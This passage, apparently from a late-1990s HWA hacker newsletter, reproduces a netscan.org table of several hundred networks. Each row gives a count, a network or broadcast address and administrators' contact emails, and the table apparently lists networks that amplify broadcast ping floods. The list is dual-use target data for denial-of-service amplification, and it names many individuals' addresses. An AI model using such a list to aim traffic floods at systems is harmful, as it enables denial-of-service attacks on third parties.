     29       200.30.32.0        nomailbox@nowhere
     29       200.30.32.255      nomailbox@nowhere
     29       202.167.35.0       paul.brooks@globalone.net
     29       202.167.35.255     paul.brooks@globalone.net
     29       202.36.35.255
     29       203.21.29.255      hostmaster@telstra.net
     29       204.101.194.0      debbie@worldlinx.com
     29       204.101.194.255    debbie@worldlinx.com
     29       204.152.145.0      netmaster@organic.com
     29       204.152.145.255    netmaster@organic.com
     29       204.178.38.0       smith@icarus.usanetworks.com
     29       204.178.38.255     smith@icarus.usanetworks.com
     29       204.28.66.255      mi00101@mi00040.monroe.k12.la.us
     29       204.71.144.0       ipadmin@cw.net
     29       204.71.144.255     ipadmin@cw.net
     29       205.143.124.255    rtesta@gia.org
     29       205.152.39.255     ipadmin@bellsouth.net
     29       205.169.153.255    ckimball@mapquest.com
     29       205.174.194.0      dharringt@deq.state.va.us
     29       205.205.132.0      dgiroux@cenosis.com
     29       205.211.37.0       teha@algonquinc.on.ca
     29       205.211.53.0       teha@algonquinc.on.ca
     29       205.232.52.255     rcm@mmc.marymt.edu
     29       205.243.207.0      ryan@inc.net
     29       216.111.167.255    noc@qwest.net
     29       206.20.225.0       noc@corp.idt.net
     29       206.196.103.255    steve@inlink.com
     29       208.203.140.0      asbad@camalott.com
     29       209.38.216.0       dnsadmin@rmi.net
     29       208.166.84.255     jgagne@monad.net
     29       208.203.140.255    asbad@camalott.com
     29       209.38.216.255     dnsadmin@rmi.net
     29       207.22.96.0        hostmaster@clark.net
     29       208.234.147.0      nomailbox@nowhere
     29       208.157.126.0      rodneyl@ctlnet.com
     29       207.66.209.255     pat@wolfe.net
     29       208.130.144.0      nomailbox@nowhere
     29       216.20.20.255      jcoco@mec.edu
     29       212.208.226.0      hahn@rmcnet.fr, olemarie@fr.uu.net
     29       207.215.238.0      jaykata@ltsc.org
     29       207.213.16.0       nomailbox@nowhere
     29       207.213.16.255     nomailbox@nowhere
     29       209.187.17.0       dns@cerf.net
     29       207.156.130.0      mpr@li.net
     29       209.3.41.255       noc@iconnet.net
     29       208.130.144.255    nomailbox@nowhere
     29       208.150.32.0       noc@megsinet.net
     29       208.157.105.0      ipadmin@desupernet.net
     29       209.132.109.255    garyq@wpds.com
     29       207.97.140.0       sbriggs@i-2000.com
     29       207.97.140.255     sbriggs@i-2000.com
     29       207.240.141.255    hostmaster@inch.com
     29       207.21.119.0       hostmaster@ncal.verio.net
     29       209.7.241.255      djurewic@lth3.k12.il.us
     29       208.215.55.0       bo@quicklink.com
     29       209.0.254.0        ipadmin@level3.net
     29       209.0.254.255      ipadmin@level3.net
     29       209.63.26.255      bradw@tlg.com
     23       193.44.96.0        orjan.l.swedberg@telia.se
     23       193.44.96.255      orjan.l.swedberg@telia.se
     23       193.44.97.255      orjan.l.swedberg@telia.se
     23       193.73.218.0       kobi@swiss.nexus-ag.com
     23       194.159.126.0      postmaster@idg.co.uk
     23       194.77.138.0       info@webmad.de, hostmaster@dpn.de
     23       194.89.12.0
     23       194.89.12.255
     23       194.89.13.255
     23       194.89.14.255
     23       195.182.181.0
     23       195.182.188.0
     23       195.182.189.0      y.cheung@dccl.net, c.heald@dccl.net
     23       195.220.107.0
     23       195.224.218.0      rush@gxn.net, lol@xara.net
     23       195.89.4.0         webmaster@the.site.ch
     23       195.89.4.255       webmaster@the.site.ch
     23       195.89.6.0         webmaster@the.site.ch
     23       195.89.6.255       webmaster@the.site.ch
     23       195.99.148.0
     23       195.99.148.255
     23       198.168.5.0        registrar@interlink.net
     23       198.168.5.255      registrar@interlink.net
     23       198.188.172.0      nes@4c.net
     23       198.59.243.0
     23       198.64.33.0        hostmaster@sesqui.net
     23       198.64.33.255      hostmaster@sesqui.net
     23       199.10.138.0       RLINDNER@force.cnsl.spear.navy.mil
     23       199.10.138.255     RLINDNER@force.cnsl.spear.navy.mil
     23       199.111.88.0       jaj@virginia.edu
     23       199.111.88.255     jaj@virginia.edu
     23       199.122.4.255      yano@fwva.saic.com
     23       199.176.66.255     michael_jones@chi.leoburnett.com
     23       199.211.192.0      ron_black_at_navtrans@fmso.navy.mil
     23       199.211.192.255    ron_black_at_navtrans@fmso.navy.mil
     23       199.252.20.0
     23       199.252.20.255
     23       199.252.23.0
     23       199.35.107.255     rick@merc-int.com
     23       199.76.61.0        philt@amelia.bham.lib.al.us
     23       200.38.68.0        proeza@mpsnet.com.mx
     23       200.38.68.255      proeza@mpsnet.com.mx
     23       202.212.202.0      hostmaster@nic.ad.jp
     23       202.212.202.255    hostmaster@nic.ad.jp
     23       202.213.234.0      hostmaster@nic.ad.jp
     23       202.218.13.255     technical@apnic.net
     23       203.2.75.255       mark@cristal.syd.pronet.com
     23       203.21.29.0        hostmaster@telstra.net
     23       203.242.136.0      mgr@ktnet.co.kr, ip@ktnet.co.kr
     23       203.29.91.0        hostmaster@telstra.net
     23       203.38.28.0        hostmaster@telstra.net
     23       204.111.64.0       wpirtle@globalcom.net
     23       204.111.64.255     wpirtle@globalcom.net
     23       204.116.96.0       mckee@admin.infoave.net
     23       204.151.38.0       bterry@burnettgroup.com
     23       204.174.235.255    jbailey@aurora.net
     23       204.176.205.0      lfo@brooktrout.com
     23       204.179.121.0      help@uunet.uu.net
     23       204.179.121.255    help@uunet.uu.net
     23       204.203.9.255      its@nw.verio.net
     23       204.213.230.0      paolucci@riddler.com
     23       204.213.230.255    paolucci@riddler.com
     23       204.48.149.255     tuma@ceo.sbceo.k12.ca.us
     23       204.49.196.0       dns@sprintans.net
     23       204.57.105.0       mjudge@atsi.net
     23       204.97.104.0
     23       204.97.104.255
     23       204.97.21.0        stewartw@fpc.edu
     23       205.138.176.0      brian@dstream.net
     23       205.138.176.255    brian@dstream.net
     23       205.139.15.255     brendan@genghis.com
     23       205.178.84.0       dave@brainstorm.net
     23       205.200.16.0       mtsdns@mts.net
     23       205.200.16.255     mtsdns@mts.net
     23       205.231.229.0      Daniel.Malcor@internetaddress.com
     23       205.231.229.255    Daniel.Malcor@internetaddress.com
     23       205.243.90.0       nomailbox@nowhere
     23       205.243.90.255     nomailbox@nowhere
     23       206.0.193.0        hostinfo@psi.com
     23       206.13.40.0        jonathan@sonic.net
     23       206.132.208.255    ipadmin@globalcenter.net
     23       206.151.238.255    baltar@sy.com
     23       206.171.16.0       jason@symbio.net
     23       209.63.149.0       cbrown@advanced-power.com
     23       207.163.162.255    hostmaster@alameda-coe.k12.ca.us
     23       209.147.15.0       art@lacoe.edu
     23       209.48.15.0        dns@digex.net
     23       207.238.117.0      dns@digex.net
     23       208.156.205.0      nomailbox@nowhere
     23       212.55.208.0       admin@cyberlink.ch
     23       207.238.117.255    dns@digex.net
     23       208.156.205.255    nomailbox@nowhere
     23       212.55.207.255     admin@cyberlink.ch
     23       207.201.65.0       support@celestar.com
     23       207.201.74.0       peter@vsnet.com
     23       207.201.75.0       alif@unibaseinc.com
     23       207.201.78.0       matthew@mcr.net
     23       207.201.124.0      support@celestar.com
     23       210.228.160.0      hostmaster@nic.ad.jp
     23       208.236.172.0      ward@intercom.net
     23       208.236.173.0      ward@intercom.net
     23       208.236.174.0      ward@intercom.net
     23       212.55.207.0       admin@cyberlink.ch
     23       207.201.65.255     support@celestar.com
     23       207.201.74.255     peter@vsnet.com
     23       207.201.75.255     alif@unibaseinc.com
     23       207.201.124.255    support@celestar.com
     23       208.236.172.255    ward@intercom.net
     23       208.236.173.255    ward@intercom.net
     23       208.156.204.255    nomailbox@nowhere
     23       208.144.7.0        DIGICON@mindspring.com
     23       207.104.20.0       jason@symbio.net
     23       206.37.32.0        norberg@medsva.brooks.af.mil
     23       209.180.96.0       paul@uswest.net
     23       206.253.240.0      cql@cdimed.com
     23       207.104.20.255     jason@symbio.net
     23       208.204.158.255    brett@winkcomm.com
     23       212.146.0.0        jukka.ylonen@kpy.fi, ripe.tech@raketti.net,
                                 ripe.registry@raketti.net,
                                 ripe.sales@raketti.net, petri.siltakoski@kpy.fi
     23       212.250.1.0        nmc@ntli.net, pulak.rakshit@ntli.net
     23       212.250.2.0        nmc@ntli.net, bob.procter@ntli.net
     23       212.58.5.0         cengiz@doruk.net.tr, gokhan@doruk.net.tr
     23       212.58.24.0        ctarhan@pcworld.com.tr, cengiz@doruk.net.tr
     23       212.146.32.0       jukka.ylonen@kpy.fi, ripe.tech@raketti.net,
                                 ripe.registry@raketti.net,
                                 ripe.sales@raketti.net, petri.siltakoski@kpy.fi
     23       216.205.48.0       neteng@sagenetworks.com
     23       216.205.49.0       neteng@sagenetworks.com
     23       209.235.69.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.70.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.71.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.72.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.73.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.74.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.75.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.76.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.77.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.78.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.79.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.80.0       neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       207.104.103.0      support@access1.net
     23       209.235.112.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.113.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.114.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.115.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.116.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.117.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.118.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.119.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.120.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.121.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.122.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.123.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.124.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.125.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.126.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.127.0      neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.94.160.0       wells@wctc.net
     23       216.100.190.0      ip-admin@pbi.net
     23       216.100.191.0      ip-admin@pbi.net
     23       209.79.246.0       ip-admin@pbi.net
     23       209.79.247.0       ip-admin@pbi.net
     23       210.141.247.0      hostmaster@nic.ad.jp
     23       208.235.248.0      pokeefe@checkfree.com
     23       212.250.1.255      nmc@ntli.net, pulak.rakshit@ntli.net
     23       212.250.2.255      nmc@ntli.net, bob.procter@ntli.net
     23       212.58.5.255       cengiz@doruk.net.tr, gokhan@doruk.net.tr
     23       212.146.7.255      jukka.ylonen@kpy.fi, ripe.tech@raketti.net,
                                 ripe.registry@raketti.net,
                                 ripe.sales@raketti.net, petri.siltakoski@kpy.fi
     23       212.58.28.255      cengiz@doruk.net.tr, gokhan@doruk.net.tr
     23       212.58.29.255      paksoy@turktel.net, cengiz@doruk.net.tr
     23       216.205.48.255     neteng@sagenetworks.com
     23       216.205.49.255     neteng@sagenetworks.com
     23       216.205.50.255     neteng@sagenetworks.com
     23       209.235.69.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.70.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.71.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.72.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.73.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.74.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.75.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.76.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.77.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.78.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.79.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.80.255     neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.112.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.113.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.114.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.115.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.116.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.117.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.118.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.119.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.120.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.121.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.122.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.123.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.124.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.125.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.126.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       209.235.127.255    neteng@sagenetworks.com, 'abuse@sagenetworks.com'
     23       216.100.185.255    ip-admin@pbi.net
     23       216.100.190.255    ip-admin@pbi.net
     23       216.100.191.255    ip-admin@pbi.net
     23       209.79.246.255     ip-admin@pbi.net
     23       209.79.247.255     ip-admin@pbi.net
     23       210.141.247.255    hostmaster@nic.ad.jp
     23       208.235.248.255    pokeefe@checkfree.com
     23       216.205.50.0       neteng@sagenetworks.com
     23       207.167.204.0      tbrunt@tvo.org
     23       209.172.65.255     hostmaster@innetix.com
     23       207.109.152.255    dns-info@uswest.net
     23       209.21.153.255     hostmaster@harvard.net
     23       207.113.154.255    hostmaster@crl.com
     23       207.167.204.255    tbrunt@tvo.org
     23       207.193.232.255    hostmaster@swbell.net
     23       208.145.15.0       stephent@intelis.com
     23       207.115.54.0       harrycw@prodigy.net
     23       206.234.131.0      hostinfo@psi.com
     23       207.203.220.0      ipadmin@bellsouth.net
     23       207.86.227.0       dns@digex.net
     23       209.131.12.255     nestigoy@mica.net
     23       208.145.15.255     stephent@intelis.com
     23       207.115.54.255     harrycw@prodigy.net
     23       207.203.220.255    ipadmin@bellsouth.net
     23       212.246.36.0       jukka.ylonen@kpy.fi, petri.siltakoski@kpy.fi
     23       209.43.37.0
     23       209.21.131.0       hostmaster@harvard.net
     23       209.226.149.0      noc@in.bell.ca
     23       207.212.182.0      ip-admin@pbi.net
     23       208.240.184.255    smw@tritonworks.com
     23       209.208.145.0      hostmaster@pfmc.net
     23       209.214.177.0      ipadmin@bellsouth.net
     23       209.214.181.0      ipadmin@bellsouth.net
     23       216.76.212.0       ipadmin@bellsouth.net
     23       206.234.131.255    hostinfo@psi.com
     23       209.208.145.255    hostmaster@pfmc.net
     23       209.214.177.255    ipadmin@bellsouth.net
     23       209.214.181.255    ipadmin@bellsouth.net
     23       216.76.212.255     ipadmin@bellsouth.net
     23       209.226.144.0      noc@in.bell.ca
     23       208.244.213.0      pforbes@opcode.com
     23       208.129.226.0      vince@markzware.com
     23       209.48.15.255      dns@digex.net
     23       207.77.72.255      george@laserlink.net
     23       209.226.144.255    noc@in.bell.ca
     23       209.226.149.255    noc@in.bell.ca
     23       209.39.117.0       netadmin@onramp.net
     23       207.126.109.255    noc@above.net
     23       209.39.117.255     netadmin@onramp.net
     23       208.168.208.255    julianc@peganet.net
     23       207.194.160.255    domains@bctel.net
     23       207.94.162.255     owen@hodes.com
     23       208.20.79.0        NOC@sprint.net
     23       208.20.79.255      NOC@sprint.net
     23       207.63.253.255     twilliams@lth6.k12.il.us
     23       207.63.254.255     twilliams@lth6.k12.il.us
     23       210.159.103.255    hostmaster@nic.ad.jp
     23       209.7.240.0        djurewic@lth3.k12.il.us
     23       209.7.240.255      djurewic@lth3.k12.il.us
     23       209.122.30.255     domreg@erols.com
     23       210.68.152.255
     22       24.5.113.255       noc@noc.home.net
     22       134.241.142.255    hostmaster@umassp.edu
     22       134.241.250.255    hostmaster@umassp.edu
     22       140.239.42.255     hostmaster@harvard.net
     22       152.9.100.0        westg@mars.nccu.edu
     22       152.9.100.255      westg@mars.nccu.edu
     22       158.59.12.255      snicho@co.arlington.va.us
     22       161.223.34.255
     22       192.101.126.0      DSN1GCM@dsn10.med.navy.mil
     22       192.122.222.0      aconway@hdl.ie
     22       192.122.222.255    aconway@hdl.ie
     22       193.0.84.255       Marcin.Gromisz@fuw.edu.pl,
                                 Michal.Jankowski@fuw.edu.pl
     22       193.106.9.255      yp@jouve.fr
     22       193.49.105.0       cambon@lirmm.fr, gg@lirmm.fr
     22       193.73.128.0       te@sda-ats.ch
     22       193.98.234.0       admin@bbr-bremen.de
     22       193.98.234.255     admin@bbr-bremen.de
     22       194.100.10.0       route-adm@clinet.fi, hsu@bbnetworks.net
     22       194.100.10.255     route-adm@clinet.fi, hsu@bbnetworks.net
     22       194.100.11.0       route-adm@clinet.fi, hsu@bbnetworks.net
     22       194.100.14.0       route-adm@clinet.fi, hsu@bbnetworks.net
     22       194.100.14.255     route-adm@clinet.fi, hsu@bbnetworks.net
     22       194.137.9.255      jukka.vesterinen@ctse.fi
     22       194.254.148.0      marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr,
                                 aperio@luminy.univ-mrs.fr
     22       194.254.149.0      marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr,
                                 aperio@luminy.univ-mrs.fr
     22       194.64.121.255     schreiber@otterbach.de
     22       194.73.96.0        dcheetham@gateshead.ac.uk
     22       194.73.96.255      dcheetham@gateshead.ac.uk
     22       194.75.152.255     chris@delphi.com, ianreeves@delphi.com
     22       194.89.13.0
     22       195.182.176.255
     22       195.182.188.255
     22       195.182.189.255    y.cheung@dccl.net, c.heald@dccl.net
     22       195.27.208.255     spona@tmt.de, hoereth@tmt.de,
                                 peter.maisel@maisel.de, hostmaster@maisel.de
     22       198.123.17.255     NSIOPS@nsipo.nasa.gov
     22       198.60.134.0       hall@sandbox.net
     22       198.60.134.255     hall@sandbox.net
     22       199.108.74.0       dns@cerf.net
     22       199.211.153.0      moffettm@dmcm.ssc.af.mil
     22       199.76.61.255      philt@amelia.bham.lib.al.us
     22       200.10.112.0       carlospe@ssdnet.com.ar
     22       200.10.112.255     carlospe@ssdnet.com.ar
     22       200.17.93.0        gomide@nic.br
     22       200.17.93.255      gomide@nic.br
     22       202.167.1.0
     22       202.167.1.255
     22       202.208.64.0       technical@apnic.net
     22       202.213.5.255      hostmaster@nic.ad.jp
     22       202.77.222.0       belcina@attmail.com
     22       202.77.222.255     belcina@attmail.com
     22       203.126.205.0      hostmaster@singnet.com.sg
     22       203.127.187.0      jeremy@sns.com.sg
     22       203.140.3.0        hostmaster@nic.ad.jp
     22       203.140.3.255      hostmaster@nic.ad.jp
     22       203.146.30.0       kanok@loxinfo.co.th, patkamol@loxinfo.co.th
     22       203.21.30.0        hostmaster@telstra.net
     22       203.238.129.0      mgr@nownuri.net, ip@nownuri.net
     22       203.26.109.255     hostmaster@telstra.net
     22       204.112.189.0      admin@autobahn.mb.ca
     22       204.112.189.255    admin@autobahn.mb.ca
     22       204.131.232.255    dave@psd.k12.co.us
     22       204.133.45.0       sbrown@co.weld.co.us
     22       204.133.45.255     sbrown@co.weld.co.us
     22       204.151.38.255     bterry@burnettgroup.com
     22       204.158.119.0      gjenere@tenet.edu
     22       204.180.36.0       NOC@sprint.net
     22       204.192.47.255     noc@digex.net
     22       204.234.20.0       murbach@docsun.doc.state.ne.us
     22       204.234.20.255     murbach@docsun.doc.state.ne.us
     22       204.234.21.0       murbach@docsun.doc.state.ne.us
     22       204.234.22.255     murbach@docsun.doc.state.ne.us
     22       204.248.113.255    NOC@sprint.net
     22       204.29.20.255      edm@nwnexus.wa.com
     22       204.48.149.0       tuma@ceo.sbceo.k12.ca.us
     22       204.49.196.255     dns@sprintans.net
     22       204.57.191.0       john@bmi.net
     22       205.139.15.0       brendan@genghis.com
     22       205.213.150.0      nic@mail.wiscnet.net
     22       205.247.7.255      sbriggs@i-2000.com
     22       206.129.189.0      dns-admin@ixa.net
     22       206.135.165.0      dnstech@eni.net
     22       206.144.157.0      stan@riversidecolor.com
     22       206.16.65.0        prophead@blacktop.com
     22       206.165.94.0       noc@globalcenter.net
     22       206.165.94.255     noc@globalcenter.net
     22       210.75.39.0        weixian@sti.gd.cn, fangxx@sti.gd.cn
     22       207.213.24.255     dennis@globalpac.com
     22       208.156.204.0      nomailbox@nowhere
     22       210.141.237.0      hostmaster@nic.ad.jp
     22       207.153.112.0      noc@netrail.net
     22       207.167.112.0      sheri@inetworld.net
     22       210.134.206.0      hostmaster@nic.ad.jp
     22       210.156.209.0      hostmaster@nic.ad.jp
     22       210.156.210.0      hostmaster@nic.ad.jp
     22       207.153.112.255    noc@netrail.net
     22       208.12.176.255     nomailbox@nowhere
     22       210.156.210.255    hostmaster@nic.ad.jp
     22       209.122.173.0      domreg@erols.com
     22       206.37.32.255      norberg@medsva.brooks.af.mil
     22       209.215.20.0       ipadmin@bellsouth.net
     22       216.78.24.0        ipadmin@bellsouth.net
     22       212.58.28.0        cengiz@doruk.net.tr, gokhan@doruk.net.tr
     22       210.159.100.0      hostmaster@nic.ad.jp
     22       210.159.113.0      hostmaster@nic.ad.jp
     22       210.159.115.0      hostmaster@nic.ad.jp
     22       210.159.118.0      hostmaster@nic.ad.jp
     22       206.216.125.0      vala@wvpa.com
     22       207.225.140.0      dns-info@uswest.net
     22       208.154.170.0      ipadmin@cw.net
     22       207.204.174.0      domainadmin@combase.com
     22       209.122.182.0      domreg@erols.com
     22       209.54.190.0       darin@good.net
     22       209.214.200.0      ipadmin@bellsouth.net
     22       207.204.208.0      domainadmin@combase.com
     22       209.215.218.0      ipadmin@bellsouth.net
     22       209.215.220.0      ipadmin@bellsouth.net
     22       209.54.224.0       domainadmin@combase.com
     22       209.215.18.255     ipadmin@bellsouth.net
     22       209.215.20.255     ipadmin@bellsouth.net
     22       216.78.21.255      ipadmin@bellsouth.net
     22       216.78.23.255      ipadmin@bellsouth.net
     22       216.78.25.255      ipadmin@bellsouth.net
     22       210.159.113.255    hostmaster@nic.ad.jp
     22       210.159.115.255    hostmaster@nic.ad.jp
     22       210.159.118.255    hostmaster@nic.ad.jp
     22       209.94.163.255     wells@wctc.net
     22       207.204.174.255    domainadmin@combase.com
     22       209.214.180.255    ipadmin@bellsouth.net
     22       209.54.190.255     darin@good.net
     22       210.225.196.255    hostmaster@nic.ad.jp
     22       209.214.201.255    ipadmin@bellsouth.net
     22       207.204.208.255    domainadmin@combase.com
     22       209.54.224.255     domainadmin@combase.com
     22       210.163.252.255    hostmaster@nic.ad.jp
     22       209.131.12.0       nestigoy@mica.net
     22       207.202.18.0       rosterman@rtquotes.com
     22       207.109.152.0      dns-info@uswest.net
     22       207.19.163.0       squires@mne.com
     22       209.119.250.0      noc@digex.net
     22       207.202.18.255     rosterman@rtquotes.com
     22       207.19.163.255     squires@mne.com
     22       209.79.176.255     diamond@quick.net
     22       209.119.250.255    noc@digex.net
     22       206.204.9.0        noc@conxion.net
     22       210.67.64.0        JamesKLin@acer.net, JacksonWeng@acer.net
     22       208.225.145.0      postmaster@dnap.com
     22       209.208.185.0      hostmaster@pfmc.net
     22       207.70.93.255      hostmaster@interaccess.com
     22       209.218.26.0       maggie@redcreek.com
     22       209.226.69.0       noc@in.bell.ca
     22       207.19.161.0       squires@mne.com
     22       207.222.168.0      mark_annati@jwgnet.com
     22       210.67.64.255      JamesKLin@acer.net, JacksonWeng@acer.net
     22       209.226.69.255     noc@in.bell.ca
     22       206.81.145.255     dns-info@uswest.net
     22       207.19.161.255     squires@mne.com
     22       207.222.168.255    mark_annati@jwgnet.com
     22       208.138.51.0       superdb@phonewave.net
     22       208.168.238.0      rpost@remc8.k12.mi.us
     22       208.138.51.255     superdb@phonewave.net
     22       208.168.238.255    rpost@remc8.k12.mi.us
     22       208.6.63.0         postmaster@watsonelec.com
     22       207.77.72.0        george@laserlink.net
     22       209.102.103.0      robertc@savvis.com
     22       207.190.143.0      hostmaster@source.net
     22       208.6.63.255       postmaster@watsonelec.com
     22       207.190.143.255    hostmaster@source.net
     22       209.14.108.0       sbeker@ta.telecom.com.ar
     22       209.14.109.0       sbeker@ta.telecom.com.ar
     22       209.14.108.255     sbeker@ta.telecom.com.ar
     22       209.14.109.255     sbeker@ta.telecom.com.ar
     22       209.69.159.255     dirvin@123.net
     22       206.211.91.255     renae.h.key@gte.sprint.com
     22       207.94.189.255     Louis_Lee@icgcomm.com
     22       208.201.208.255    shai@interramp.com
     22       207.223.57.0       maa@jwgnet.com
     22       209.21.201.255     hostmaster@harvard.net
     22       208.129.72.0       digital@uscybersites.net
     22       209.38.22.255      dnsadmin@rmi.net
     22       208.215.55.255     bo@quicklink.com
     22       208.129.72.255     digital@uscybersites.net
     22       206.211.86.255     renae.h.key@gte.sprint.com
     22       209.133.189.0      colgate@oir.state.sc.us
     22       209.133.189.255    colgate@oir.state.sc.us
     22       206.201.241.255    scarr@huensd.k12.ca.us
     22       209.107.45.255     hostmaster@co.verio.net
     22       209.47.137.255     bmollon@saatchi.ca
     22       209.14.135.255     dnr@spacelab.net
     22       208.129.14.0       sundog@coop.crn.org
     22       209.208.223.0      hostmaster@pfmc.net
     22       209.166.16.0       hostmaster@ultracom.net
     22       207.243.35.255     nomailbox@nowhere
     22       206.247.91.0       rkd@rmi.net
     22       206.247.91.255     rkd@rmi.net
     22       209.227.25.255     eric@mxol.com
     22       216.102.160.255    ip-admin@pbi.net
     21       24.6.100.0         noc@noc.home.net
     21       24.6.61.255        noc@noc.home.net
     21       24.7.177.255       noc@noc.home.net
     21       63.64.219.0        help@uunet.uu.net
     21       63.64.219.255      help@uunet.uu.net
     21       131.64.12.0        SSNYDER@cols.disa.mil
     21       140.251.214.0      vinay@mail.med.cornell.edu
     21       140.251.214.255    vinay@mail.med.cornell.edu
     21       155.36.122.0       scott@ties.org
     21       155.36.122.255     scott@ties.org
     21       155.36.123.0       scott@ties.org
     21       155.36.123.255     scott@ties.org
     21       155.50.21.0        bgallant@keps.com
     21       155.50.21.255      bgallant@keps.com
     21       160.126.250.0      DEYODEB@detrick.disa.mil
     21       160.126.250.255    DEYODEB@detrick.disa.mil
     21       160.126.251.255    DEYODEB@detrick.disa.mil
     21       161.132.57.255     operador@rcp.net.pe
     21       168.234.39.255     mmorales@concyt.gob.gt
     21       192.204.141.0
     21       192.204.141.255
     21       192.207.6.255      tom@server1.angus.com
     21       193.100.188.0      herrnfeld@kirchhoff.de
     21       193.100.188.255    herrnfeld@kirchhoff.de
     21       193.122.10.0
     21       193.140.196.0      ozturanm@boun.edu.tr, baysalc@boun.edu.tr
     21       193.140.196.255    ozturanm@boun.edu.tr, baysalc@boun.edu.tr
     21       193.15.208.0
     21       193.194.142.0      kocovski@gagass.de, jan.kocovski@metronet.de
     21       193.194.142.255    kocovski@gagass.de, jan.kocovski@metronet.de
     21       193.194.143.0      kocovski@gagass.de, jan.kocovski@metronet.de
     21       193.194.143.255    kocovski@gagass.de, jan.kocovski@metronet.de
     21       193.194.88.0       benhamadi@ist.cerist.dz, elmaouhab@ist.cerist.dz,
                                 cerist2@cnuce.cnr.it
     21       193.52.147.0       Gerard.Lietout@univ-rouen.fr
     21       193.52.147.255     Gerard.Lietout@univ-rouen.fr
     21       193.52.75.0        dupre@genome.vjf.inserm.fr
     21       194.100.24.0       miki@clinet.fi, Kari.Rasanen@seiska.fi
     21       194.137.92.0       ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi
     21       194.137.92.255     ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi
     21       194.158.231.0      daniel.waegli@sunrise.ch,
                                 daniel.dubuis@sunrise.ch
     21       194.190.192.255    andr@trustworks.com
     21       194.199.97.0       Paul.Sarlat@univ-ag.fr
     21       194.199.97.255     Paul.Sarlat@univ-ag.fr
     21       194.250.16.0       bourgeois@fermic.fr, niel@fermic.fr
     21       194.254.147.255    marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr,
                                 aperio@luminy.univ-mrs.fr
     21       194.255.12.0       paaske@internet.dk
     21       194.255.12.255     paaske@internet.dk
     21       194.57.10.0        techfem@mobilia.it
     21       194.57.10.255      techfem@mobilia.it
     21       194.64.121.0       schreiber@otterbach.de
     21       195.182.176.0
     21       195.182.177.255

     Use of netscan.org indicates acceptance of this disclaimer.

        © 1998-1999 netscan.org 
        Site version 0.98 
        sysop@netscan.org 
        Changed 12/29/98 0606 PST 
       
      
     @HWA 
     

     !=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
           
           
           
           
                                             O
                                             0
                                             o
                                           O O O   
                                             0

     -=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
      
     END of main news articles content... read on for ads, humour, hacked websites etc
              
     -=----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
     
             
